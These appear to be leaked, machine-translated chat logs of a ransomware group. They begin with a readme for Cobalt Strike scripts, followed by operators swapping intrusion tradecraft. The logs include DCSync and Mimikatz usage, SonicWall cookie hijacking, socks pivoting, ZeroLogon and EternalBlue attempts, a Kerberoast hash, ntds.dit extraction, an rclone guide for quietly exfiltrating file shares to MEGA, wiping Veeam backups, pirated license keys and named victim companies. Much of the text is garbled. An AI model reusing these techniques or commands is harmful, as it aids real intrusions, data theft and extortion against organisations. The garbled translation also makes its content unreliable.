Adds option to cd command to return to previous directory.
Usage: __cd -__
## dcom_shellexecute
Side-move with DCOM (ShellExecute)
Usage: __dcom_shellexecute [target] [listener]__ to create a new bacon on target via DCOM ShellExecute object
## DebugKit
Additional debugging tools in the DebugKit pop-up menu, the console script and in the bacon.
Commands in the console script:
__!beaconinfo__ - get bacon information
__!loaded_powershell__ - show loaded powershell commands for each bacon
__!c2_sample_server__ - show what the responses from the C2 server look like
__!c2_sample_client__ - show how client requests look like
__!who__ - show all people connected to timeserver
__!pwn3d_hosts__ - show list of hostnames, that ever created sessions
__!show_data_keys__ - show keys in Cobalt Strike data model
__!query_data_key __ - get values by key from Cobalt Strike data model
__!sync_all_downloads__ - synchronizes downloaded files from the Cobalt Strike server to the specified folder and recursively recreates the file paths that the files had on the target hosts
Usage: __!sync_all_downloads [/path/on/client/machine/to/save/downloads/to] __
Commands in the bacon console:
__!iscsadmin__ - check the current bacon via the -isadmin function
## csfm.
Queries the database for known commands, outputs useful tips for the operator.
Syntax: __csfm [List]__ - listing all csfm options
Example: __search computer, tip ntlm__
## EDR.
Remotely polls the system for EDR products
Syntax: __edr_query [hostname] [arch]__
## Color Coded Files Listing
The script colors the output of the ls command and lets you see the downloaded files by highlighting them
## Forwarded_Ports
Tracks configured remote port forwardings on all bacons and allows you to easily remove them
Using 'rportfwd' quickly consumes the pool of available local ports from which outgoing traffic is forwarded, and tracking them manually becomes tedious on long projects. This script is designed to fill that gap by collecting these commands and presenting them in a nice visualization pane.
## HighLight_Beacons.
Highlights new beacons in green, inactive ones in red.
## LogVis
Advanced visualization of the beacon console output.
## MASS-DCSYNC
DCSync attack applied to the list of domain users.
The user list file must contain one user per line.
## MIMIKATZ_ADDONS
Performs a password change that allows you to change the NTLM password for a given account.
Uses the Mimikatz password change feature, which allows you to change the NTLM password for a given account without registering setpassword events.
**Use:** password_change [Username] [Known old hash or password] [New hash or password] [SERVER/DC/localhost]
## PING_ALIASES
1. alias **qping** sends a command line ping packet.
**Use**: qping [target]. The **target** parameter is optional.
2. alias **smbscan** scans port 445.
## PORTSCAN_RESULTS
Menu item under View. When launched, a tab opens with the results of the smbscan run.
## PROCESSCOLOR
Highlighting process categories (antivirus, explorer, browsers, current process) in the beacon process manager (Explore => ProcessList).
## PS_WINDOW_ALIASES
alias **pspane** opens the process manager.
**Use:** pspane
## SLEEP_DOWN_WHEN_NO_OPERATORS
Increases the sleep interval for beacons that have no active (logged in) users.
## SMART_AUTOPPID
Reassigns execution of beacon commands and all beacon jobs to a designated process (svchost.exe).
All commands will be executed depending on context/privileges (user or system).
** Usage:** autoppid
## WIN2012MIMIKATZ
Adds a key to the registry for mimikatz to work.
vampir
BYI245Y52NCndjjYRhRmzagina you log in and write tweetuok now I'll give you a new account we are reorganizing not a big hello, heretut? the question is removed
i forgot i already told the grid, you can see the balls there) ``https://book.hacktricks.xyz/pentesting/pentesting-smb#list-shared-folders[ ](https://stylebrooks.com/group/discussion?msg=e2yKoiESHwgaYadiD) ``net share
? ``balls gathers advansedaypiskaner normally I looked at the code shairfinder, he does not do anything particularly criminal :) and you have just 200 servo?:smiley:I throw options, no more than that) certainly not through peches fuck all the cars you want? but I think the technologist will not approve this method :) now I say *rozetka * thanks!it will do if you run through psekes and take output which shows what network folders on this pc there is a command do not remember shorter commandimpacket yes it works, but do not poke the same 100 + servers through smbclient.rua there is also probably not a very good way, but that's it I tried to watch it, it kicks out access denied with the context Datam by the way yes, there is a problem with no vyutam module for SMB not one there is impacket live via sokstogda pinging ipakipet view does not work in this grid )``tasklist /s HOSTNAME
and the database servers will be detected without check mark \ALL I think if you uncheck the check boxes, just use eexcel to tidy up the check boxes and see all servers in bulk, no problem =) we have a couple hundred unmarked servers, we try to see where everything is) ``net view \\host
net view \\host /ALL
```
first balls
the second with local disks have not triggered AV ever but there is a tool not pale if for example server 2012 without amsi and we do through psyngect, is there any chance that AV will kill? anyone use sharefinder on a regular basis now?
I'm wondering if it can trigger an av or network proactiveNelsons4 who has run into a backup? can i get craps from there? of course. how is it with payments? does anyone have an outlook client, preferably not a trial? i think so, but it's like putting it in the trash and there's just no deletion option?cloud backups on viam who tried to crush? account got it. and how to remove? overwrite want to try, but mb have an alternative? threw the keys, all activated, cp) ` `PLZ92-LYS8J-ANV3S-SZRQ7-GPG3F
5JZ6S-B3FKJ-49YYP-HCCQN-3JVHX
TQZVQ-X36SC-SFZYC-TAC7E-BQF9S
2VZ8M-BYC2A-A3Y3P-6LQQ5-HNDN8
CJZXN-BWFDK-Q2Y2M-VSFCT-E7YLW
6KZ2V-A2UXK-YAWWC-YJ9QG-MW4RG
RSZXG-M2YDB-R5SWQ-3XR7Z-L42PN
ULZCW-2YQNG-FL83G-9DGLR-9TFQA
oh well, now I'll try it) lay on picaboy did so at least, the key got up without a cocksucker google and type in mb who knows where to get? does anyone by chance have the key to the face proxyfaer?[ ] (https://stylebrooks.com/group/discussion?msg=5auyX86kHct2PnDik) gotchaThere is no such thing on this network, subconsciously immediately started looking for a new bookmark))) @ali please quote the message and not respond to the topic (the button to the left)
there notifications have to closeObviously i have the ability to create bookmarks theredanu it turns out his computer is asleep just yet, if i do not kick it happily, and just do not connect? i eleventom first made a system session and it already injected another account may try but you "kick" the user will if he bookmark only on his workstation new artifact kit, all in the system does not migrate session from the admin * NetExtender Clients
put, yes 2fana, no you have 2fa yes? tShow bookmarks > there's no new bookmarks?
Alarm Trying to connect ...
There is a problem connecting to this machine, please check it... The client could not connect to the remote computer. Remote connections might not be enabled or the computer might be too busy to accept new connections. It is also possible that network problems are preventing your connection. Please try connecting again later. If the problem continues to occur, contact your administrator.
``Work PC there what? I can't find where to add this tab. It feels like there's no such option in Sonicleave RDP
i'm logged in there without any credentials
I don't remember exactly but it was intuitively clear create new bookmark once redirected to the portal but there was no bookmark to connect to the PC
Same way, if you want to make a new bookmark go straight to that SMA try to make a session under another cookie, it doesn't ask me how, it tries to connect to 127.0.0.1:8877
the connection is made from your ip to the sonic gateway and then to the virtual desktop (or physical host) the SMA should be just put on the dedication and it will connect through the localhostsorry, confused with NetExtender Clients
in SMAConnect there proxy I enter: target ip, port 443, creeds?
I did and then I do not know what to do) they are fresh, here we had this, as I understand it sessions died justThrough him enter creeds, 2fa sendsThrough him try to enter was secur mobile accesses client? SonicWALL
- encoding the session ID in base64
```
>> btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- I put in the URL `https://target` (redirects to https://target/cgi-bin/welcome)
- I add a cookie to the console
```
document.cookie="swap=NDdaakZLeDI0TmoyaDBVdFpLWDJWDPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- In the browser (where .../cgi-bin/welcome) I edit the URL to `https://target/cgi-bin/portal`
- It takes me back to the page `https://target/cgi-bin/welcome`
so for all three sessions in the Target
one session once redirected to the portal, but there were no bookmarks to connect to the PC
Anybody had problems with this? what did you do next? @rozetka @t3chnolog thanks for your help) everything started, "went ore)) "on port 80th https raise or 8443 maybe even cobalt to roll up and try it now you can just pull jobs with socks and start with another router repawn sessions do shortly I think you have a wrong configured router `tcp 0 0 185212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby I thought it was fucked up) it's a server with a msfu no external IP? are you behind a NAT or something? interface to your provider's LAN andmeterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 65539
============
Name : Microsoft Hyper-V Network Adapter #2
Hardware MAC : 00:15:5d:79:a8:19
MTU : 1500
IPv4 Address : 172.30.100.175
IPv4 Netmask : 255.255.255.0jobs -k number Print the socket list, take them all out and start one from the session you want mask /8 for 10.0.0.0 subnet only e.g. 172.8.240.5 what you have specified may not be recognized as a local address at all
10.0.0.0 - 10.255.255.255 (the subnet mask for classless (CIDR) addressing: 255.0.0.0 or /8)
100.64.0.0.0 - 100.127.255.255 (subnet mask 255.192.0.0 or /10) - This subnet is recommended by RFC 6598 for use as Carrier-Grade NAT (CGN) addresses.
172.16.0.0 - 172.31.255.255 (subnet mask: 255.240.0.0 or /12)
192.168.0.0 - 192.168.255.255 (subnet mask: 255.255.0.0 or /16)
```
wikipedia if the second then you first put it ``172.0.0.0/8`` this strange? or ufw disable this one google local network masks then ``72.0.0.0/8`` your subnet mask is still strange, you know? add session number what port forward and rules in ufw ``
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
172.30.0.0 255.0.0.0 Session 3
172.30.100.0 240.0.0.0 Session 4
``route print show the socket should look in the router specified? port fwd is also another and there is no port forwarding on the server do not do? like this add 172.30.100.0/4 4 or tryroute add 172.0.0.0.0/4 4route add 172.0.0.0/8 session 4172.30.100.0/24 and as a router prescribed in what diap should "watch"? What I forgot to miss?
1) there is a session on the server in the coba it is not spawned
2) on the server to run sox to the local host can look into the network
What has been done : I prescribed the router
```
IPv4 Active Routing Table
------ ------- -------
172.0.0.0 255.0.0.0 Session 4
```
2) Sox started : the port on the server opened and is listening
```
msf6 auxiliary(server/socks4a) > set srv
set srvhost set srvport
msf6 auxiliary(server/socks4a) > set srvhost 185.212.129.112
srvhost => 185.212.129.112
msf6 auxiliary(server/socks4a) > set srvport 1000
srvport => 1000
msf6 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
msf6 auxiliary(server/socks4a) > netstat -antp | grep 1000
[*] exec: netstat -antp | grep 1000
tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby
msf6 auxiliary(server/socks4a) > netstat -npl
[*] exec: netstat -npl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 185.212.129.112:300 0.0.0.0:* LISTEN 555/ruby
tcp 0 0 185.212.129.112:305 0.0.0.0:* LISTEN 30554/ruby
tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby
```
UFW disable
I prescribe in the proxychains ip server port, trying to ping hosts from the network are not pinged.I do not know well, but mba tipsPlease write to lsnu or mba someone knows regulars (although I do not know whether this issue can be resolved through regulars)anyone worked with databases maile:pass or similar bases for the brute force? data from sharepoint / office 365 has mastered who pull? already which time I met that they store dokichom vssadmin not suitable?
I did a snapshot, took everything, removed it, no traces, except logs)stewartThank you.https://github.com/zcgonvh/NTDSDumpEx@t3chnolog got it, thanks!
i can recommend some other software for the dekrypt, please?
https://github.com/Dionach/NtdsAudit/issues/3Господа, has anyone encountered this?
I just downloaded `ntds.dit` and `SYSTEM` via `psexec_ntdsgrab`, then I try to use NtdsAudit, which throws the following error `Database was not shutdown cleanly. Recovery must first be run to properly complete database operations for the previous shutdown.`prince@Air give me hell here tomorrow will be a full update@alter and where the instructions) I wonder what the new tools with the context thinly but cranked up) it's like ms17 on win2008 buy a token or somethingdomain\usermake_token domain/user accounts from the remote where the VPN stretched went on and on but did not start then domain account took yesterday received a similar errorgetuid show[*] Tasked beacon to run .NET program: SharpZeroLogon.exe hopo-dc2.holly.local false check
[+] host called home, sent: 114807 bytes
[+] received output:
Performing authentication attempts...
Unable to complete server challenge. Possible invalid name or network issues? beacon> execute-assembly C:\soft\SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch
[*] Tasked beacon to run .NET program: SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch
[+] host called home, sent: 114279 bytes
[+] received output:
Patching failedI had such an output I need time to test it I already sent it for rebuild We'll correct it and add to the toolchain a binary in the form of a dllcheck better sharpzerologon it is more reliable but in general we have a whip access so you can use sharpzeroLogon in the case recently was literally bumped yesterday
i can't help but wonder if the problem is solved and i don't give a fuck if it's working or not, but in the log above you can see there are a couple of errors and it doesn't seem to be working either, it's about zero.the zerologon's buildcheck doesn't work for me, it's better to dotnet in the toolchain and pavnin the binary should "crawl" and then say vulnerable or nottoday i'll throw someone check zerologon was able to run? how should the result look?
yes, first tried it in meteor, and later in the coba with the flags worked)usually need interactive shell additional flags can be removed if it's a software clip can not, there is no such alas, only meteor daaga, thank you, decided just through him)throw the session meterpreter there interactive shell ...aha, got it, sorry)interactive shell? as far as i know you can not,i never had to,now i have come acrossHi all, who knows if it is possible to continue a query with cmd in coba?) let's say i sent a command to a particular shell soft.exe parametr , the answer came and keep the session to send a replyok thanks, i will look at examples to portscan cobalt, syntax error probably add ` ``icmp 1024
``Hi all!
beacon> portscan 192.168.0.0/24 445
[*] Tasked beacon to scan ports 445 on 192.168.0.0/24
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
Why can this happen? The scan ends right away.
The range is exactly like this ``-size 10 -p \\host\share
Is it possible to distribute threads in the locker somehow to connected balls?) Increase them so that balls start locating faster without using the mega client) and event triggers are the same (if configured), the main thing that the signature is not detected on this all the same as when using the desktop mega client I think for this reason what?
in larder cortices this thing will be stolen, right? can be immediately improved) it was originally installed through the rdp, from the user. and to work through the coba, from systems, the rclone must point to config C:\Users\user\.config\rclone\rclone.conf
and i still can not find the path. i tried to mount a disk, but it did not work. that's how it is with me) only if the session from the admin open through the rdp, then it will only be happyxm
I've tried to open a session with an admin. when using it write if something is missing in the functionality, finalize it)tried it, normal tool) thank you now really do not need to get into the rdp cool, thank you is generally convenient, immediately after the ball put all the fs to skaii and went to do things) normal stuff should look only I have through the coba did not get something to copy aha)))) heh heh
okay
it means colleagues work with it, ok) we are also in business then)articles about it just started to use it as I understand it```
Egregor RaaS Continues the Chaos with Cobalt Strike and Rclone
``Is the http protocol on any port in the process? how is it visible/not visible in the system after installing what protocol? in 50 minutes 10gb download do it for coba) https://github.com/rclone/гсІопевот more a guide on it
Hi all! Those who download files and everyone will find it useful! Very cool thing, RCLONE
now there is no need to unzip mega files! everything is very quiet and unnoticeable!
I do not know how to describe it)
download rclon from the off-site. rclon.exe put it in the folder you need, then follow the manual.
clone everything you need. everything is downloaded via the clone, so the download speed is high.
Here's the guide. It's simple
https://rclone.org/mega/
next command to download
rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
remote:NT - change only this.
"remote" is the name of your mega.
"NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself.
example
rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
Happy Christmas Eve to everybody! :)Happy New Year to all !!! Happy New Year to all !!!) :partying_face: :tada:Happy Holidays to all)Happy New Year !!! :champagne_glass:in the profile search for wusaRemind pliz how to fix it in cobalt?
[-] could not spawn C:\Windows\system32\wusa.exe: 740
``like redirecting from local to domain, try domainnextcreditsmaybe someone has encountered this issue...
need to remotely enable port 3389 RDP on the LA (local admin)guys who encountered such a message? what is it in general and how to bypass@all d-box.com - whose fortik
@all groupemontoni.com - whose fort?
I repeat! execute-assemblyhttps://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogonвсем hello, does anyone have instructions on zerologon and proxilogon? who has encountered this error?
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 5.199.174.223:4444
[-] 172.31.30.188:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
This is the first time I've had such a mess and problems ¯\\(ツ)_/¯or for example the 3rd issue, we have two hosts, one of which was mentioned above and everything runs fine, let it be host1 and host2 where remote commands can not go through and only go through rip and let it go through the console
For example, let's take a batcher on host2 . So when I go to rndp on host2 and trying to edit / change the text batch or just delete it he writes that I do not have the right to do it (batch file is in the classic programdata) but if I go to host1 and in the file browser to move to \host2\C$\programdata then I can easily delete that batch or copy a new one from host1 did not say the wrong session, I meant the logged in user on the host, about rdp - as an option, try to migrate to the system process, so you after logging off the session did not fall off it is either a bug or a feature) ` `.
>When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rndp and starting the same batnick, for example, everything is started normally.
```
I also met this once, what is it, I do not know, but most likely in the settings ADGod need advice. What can it be ?
The symptoms :
1oe There is an account YES which normally goes everywhere. When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rdp and starting the same batnik for example, everything is started normally.
2o There is a session from this user on one of the hosts where everything works fine when you connect to other hosts by rdp (tried 5-7 hosts) and close the window rdp session, the account is unlogged. Roughly speaking, I can not let the process and close the RDP window, the process will be executed only when the active RDP session.
While on the same host as I pointed out above is not observed.
What can it be? Some tricky settings in the GPO? Why on hrdp I can execute commands and remotely remotely does not work,
On one host the account works fine and closing the RDP window the processes work and on other hosts there is a "logout"
PS Maybe some kind of glitch? I could not in the beginning randomly out of 100+ hosts to choose exactly the one on which all works well do not see#1.done.ohiodominican.eduNashee have access to soks? luks hangloloyalnoda like on injekt it more lesses bitdefender lsass who removed? or how to inject\style the process polozak? have a clipboard grabber? share plz @all groupemontoni.com - whose fortik? @all d-box.com - whose fortiks diskinventory this must be removed from the list but left on the hard
and remove from the drive it from the hardavo you see there from the inventory and from the drive, from the drive as I understand it should? not done in a long time) @all just in farnese, better ask again) who online, remind pliz to completely remove the backup, which button to press, from the inventory or drive (I assume that the drive) spsklient? have anyone who has faced, tell me, RedCloack AV on mimic sizzles?
gentlemen
if someone says so - write to PM
Alexandar Yerminov, aka veger in lss) or those who are there for backup in fact do you try just rdp to go to the server, viam, open the console and enter the creds domain admins?
Guys who found the central server viama (to decrypt), through the proxy server viama, removed the task list of each server, went to all servers that have the process viama
1. the server on which the viam console, runs viam services but does not spin skl server
2. on the servers where both you services and sqlservr.exe are running - no port detected by the PID of sqlservr.exe process
help who faced the problem is anyone online?
need help when working with Іssas thanks)[ ](https://stylebrooks.com/group/general?msg=aLPhGWXPWcNHtJ2g4) it pulls SharpChromium from the guitar, collects all chrome browsers[ ](https://stylebrooks.com/group/general?msg=aLPhGWXPWcNHtJ2g4) there was some sna script from the chinese. pulled it like. from polzak context switch someone pulled passes from microsoft edge via mimic? what command to pull? thanks)take 2 Ubuntu 18.04, watch this video and configure) ``https://www.youtube.com/watch?v=lT1dhfRKPwo
Ubuntu 18.04 !!!``and never been banned,I just googled for this purpose which accepts bits and does not ban for lifting the vpn hello all,advise a good hoster to lift the vpn on the server,thanks in advance)``
Ns5WQ4hUEqxZRO4Ls1WW8wn8K95FKrkEKLxyjXjdwmjb0NpLosviDzW1N1arhNiY
```
look, whose is it? maybe someone has a script or a program you can advise? or what kind of logs are you going to clean?
the detective it build?:thumbsup:hello if you have a problem with the rise of the session ks\msf - come on, there is a solution in the new rocket it is already there and do it so do it periodically pass the session no on vpnnet sessions want to tell all?
We are Wolt (belongs to Food & Beverage) from Germany. Our Site is: wolt.com
```
whose case? suddenly got in touch with the old someSteven like)Thankshttp://vc.ru/newtechaudit/108392-kak-posmotret-istoriyu-usb-podklyucheniy-k-stacionarnomu-kompyuteru-noutbukuhttp://pyatilistnik.org/kak-udalit-dannyie-o-usb-fleshkah-v-reestre-windows/их no system can not remove yet. so palyat when information is dragged insider in the event log? but definitely saw this somewhere long ago . there icons \ numbers from flashcards where - can't say in the registry is therespasiboposyal in the history of backup jobs it may bebackup panel you need to look at it to monitor the time of connection and if sohope to know if it's true there is an idea that they write to the removable drives straight history? most likely no way Good evening everyone, tell me - how can I look history of connected disks or removable media?i found sharpweb's hash, i'm looking for it badly. sharpweb can't do it, and sharpweb can't do it, but there's no compiled one, and invoke doesn't want to do it with history and nfua than to save history in browser and inexplorervampir how much broskerberos hash?hashes on the brute force you can throw meopotom will be farm, there are already working if you're about "kerberos hash" then look for someone with a farm, now we have a team as far as I know no one with a farm for brute force on cmd5.orgwhere do you brute force hashes?the username does not have admin rights again, looking at whether or not you have LAPS or take off the local admin and try it if you have rights for the logged in user, you can try to neighboring hosts his accountS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19041 N/A Build 19041 and on the user computer has system rights, win10 proms17 bypassed, triedC:\Temp>net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 42
Minimum password length: 0
Length of password history maintained: None
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: SERVER
The command completed successfully.
C:\Temp>If your goal is not to study the math, but to get ahead as fast as possible, then fuck with ms17 and try it) Firstly, it is not certain that you will unboot this sqluser (see password policy in the corp, if it is hard, then forget it)
secondly, it doesn't mean you'll get out from under MSSQL (can you do xp_cmdshell?) i'll tell you about your situation. the point is that until you understand what the fuck it is and what kind of hashes and tickets you can't experiment it won't let you go anywhere because the user has no rights) i experimented[ ](http://wfy76wigkpoxqbe6onion/group/discussion?msg=4GWTca9k9tLBhidBj) shortest way to brute force this hash, service suggestion? well you can experimenttut here's PTT like dohttp://www.tarlogic.com/en/blog/how-to-attack-kerberos/а what options do you want besides brute force? pc4 you have there I understand you have no options? and you can brute force account ѕqq51B↩lusservot you have a ticket for access to MSSQL ``
Client: web @ site.site.NO
Server: MSSQLSvc/sitefil2.site.site.no:1433 @ site.site.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
Start Time: 11/3/2020 15:43:35 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
``[*] SamAccountName : sqluser
[*] DistinguishedName : CN=sqluser,OU=servicekontoer,OU=Brukere,DC=site,DC=site,DC=no
[*] ServicePrincipalName : MSSQLSvc/sitefil1.site.site.no:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*sqluser$site.site.no$MSSQLSvc/sitefil1.site.no:1433*
$EB8CBB4DE3FE7E85D546295C5751C113$94A8BAC69FFF58B63BCBFD195BAF31DF7B9ACCD69A201E
AAD2380BE7FC7FD181C4E380456869C3AD57B1BC069BCFDBE2EF0506B4863B55D6480EB67F118CB6
56FC5264570CFA71380CF73585CD87E02C43E7B73AC5FBB21453C06ED4779030CD832E1976FEAC7D
9922B46AAC80B96502B00E3C0174DFFFA980FDDD25969C007753DBAFB5A773969CB35AE749791FFB
69349831CA80696AE6E1CF4E18608EA32F5A33AA363427D9D1DEF134D36E49DD8CC765EA1F694AA6
6018BD881EB33D2A69263A45EED6CB0E2EB3EE19AD80E3652B907862E86F61F3A08A592D78E538C1
D2106EAA1395C7C12C59838E7514EA449E200D5531B2C034F2A111809409E24C8B0AE60B5A160882
C70C5B905D5B821A1E62F937248624DAC1C0E87D86BA6EA789072359FF1B2C1C78E1870140EFDE02
B6464FF4703A1D6922A59A02CE2211FFD2CE7EAA1D0C637A167E621DB67D8479784DF5B0E2F2B8E4
C722590DAA15A1572B288D3B564E75DAE2C114E2A3279C3645A2D66960A61921EA593BA1EDE6E78B
16BB939ECD6DF6AB415CDB995B67CA19E10B52AA416DCF5750F19E77FD6ADDB480B0A14626615710
39F4321C097888FC12EE2EEB900BEB8CAD51E9ABE3A92AE9E554853E4E3E9BC8C689925FD2D64BFD
BC3CB81B0B0E09801311F2807A2704F2D19334BAF9BEDC72669069BF8760D32CCD079A5B7753A19D
44526F4CC4ACEEE5239996855B7DE8100623368C4826A06483107DDEB5900330B0C33103CAEF17EA
0642B3A1C01F0A1F6B349DAE1E99D58B25D1855E5CC334DBE1867D2BA669DAF7EB968A271FBD380A
6C0777ACBED5F7DC436E4E52CD0F8ACDD27B9A0F3BC0F48561B90062B8CA35B9F29D03554B63C9A3
3557792A86B3C89CE17E4D19AED61CC03E8B529A1DEE1126C5B8134F783A2854D2D31DA48617AF5D
7CB2D83B103B7501DD4DFFD6218D1FE59E94A79C2F370A2E2E3A5E71F1CC39F04EDD3EB236406E45
2672066377706BAB7835E5EAAAEB09A1DAC8A00A5EBD1D0CDE1675D487669C1F1604A70D4EC5DFA6
E851ACADB89B83E66503A846028BAFAC0C22AB8186961B0778990CCAC9F2CA5144575DEC274FE4BF
987CFF98041185AC931E6004316796DEDCFE212CCBB26EFA760504315DBBA225557C4DA69578C727
483A10EAB960FD994FD55B1AC1D75B926200778278FB9CD4EBF6D80F428B26FC97042B0FE39DC566
BF3F0FD55287C36671014BFDDE03AC60746788C3790C68D1CD056DA4BCE4D9CF8BF3FA0E1154ADEF
EBEEE3F8C15736C690D07BCBD9ABC837BA54C80C3EB388DC3609F0B31DA2C0AD041ED576239705F2
CCBA3D56F584C6A1200085F0ED6A7CE06A628EE8CE19D45356B2F3C7AC2C77FBF89CE64A8EA776DB
987B712E827A7580CAFF1442A06122A889EC3DF7AA7D00F1E2F1BBCA3E4E6ED03EB312915CDF11fuck it gives me a [ez vyt tuj dslftn I do not understand if there is no ticket ѕq51B↩lussee what stage you have a hitch? 1) you request tickets
2) you unload them from memory to disk
3) you brute force
4) PROFITchel, I don't get it. I used empire and psh invoke to give out kerberoast where did you "get it"? and where do you see it if you say it's not in memory?it's a MSSQL account on some server, there's no such ticket from this user, it's not a hashfuck I wrote, I did a kerberoast and got the hash of the domain user : $krb5tgs$23$sqluser$site.site.no$MSSQLSvc/sitefil1.site.site.no:1433tralya I have a hash from admin, but they are from the current username. Yes, these tickets you have two options, either you're smoking a match on kerberos and on the attack kerberoastin, or stupid you learn commands in mimic then you unload from memory to diskthat you have tickets were not only the current user you first need to ask them when you throw tickets to the brute force, he takes the dictionary, converts the password into AES-256 and tries to decrypt, where decrypted - bingo> KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
this isn't a hash, it's a ticket: $krb5tgs$23$*sqluser$site.site.no$MSSQLSvc/sitefil1.site.site.no:1433*
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:{Windows\system32>klist
Current LogonId is 0:0x5d20442
Cached Tickets: (9)
#0> Client: web @ site.site.NO
Server: krbtgt/site.site.NO @ site.site.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwardable renewable pre_authentic n
ame_canonicalize
Start Time: 11/3/2020 14:41:29 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x2 -> DELEGATION
Kdc Called: sitefil2.site.site.no
#1> Client: web @ site.site.NO
Server: krbtgt/site.site.NO @ site.site.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authenticating nam
e_canonicalize
Start Time: 11/3/2020 14:41:26 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: sitefil2.site.site.no
#2> Client: web @ site.site.NO
Server: MSSQLSvc/sitefil2.site.site.no:1433 @ site.site.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
Start Time: 11/3/2020 15:43:35 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
#3> Client: web @ site.site.NO
Server: WSMAN/sitefil1.site.site.no @ site.site.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
Start Time: 11/3/2020 14:59:41 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: sitefil2.site.site.no
#4> Client: web @ site.site.NO
Server: cifs/sitefil2.site.site.no @ site.site.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
Start Time: 11/3/2020 14:41:39 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: sitefil2.site.site.no
#5> Client: web @ site.site.NO
Server: ldap/sitefil2.site.site.no @ site.site.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
Start Time: 11/3/2020 14:41:29 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: sitefil2.site.site.no
#6> Client: web @ site.site.NO
Server: cifs/sitefil1.site.site.no @ site.site.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
Start Time: 11/3/2020 14:41:29 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: sitefil2.site.site.no
#7> Client: web @ site.site.NO
Server: ldap/sitefil2.site.no/site.site.no @ site.KUMER
A.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
Start Time: 11/3/2020 14:41:28 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
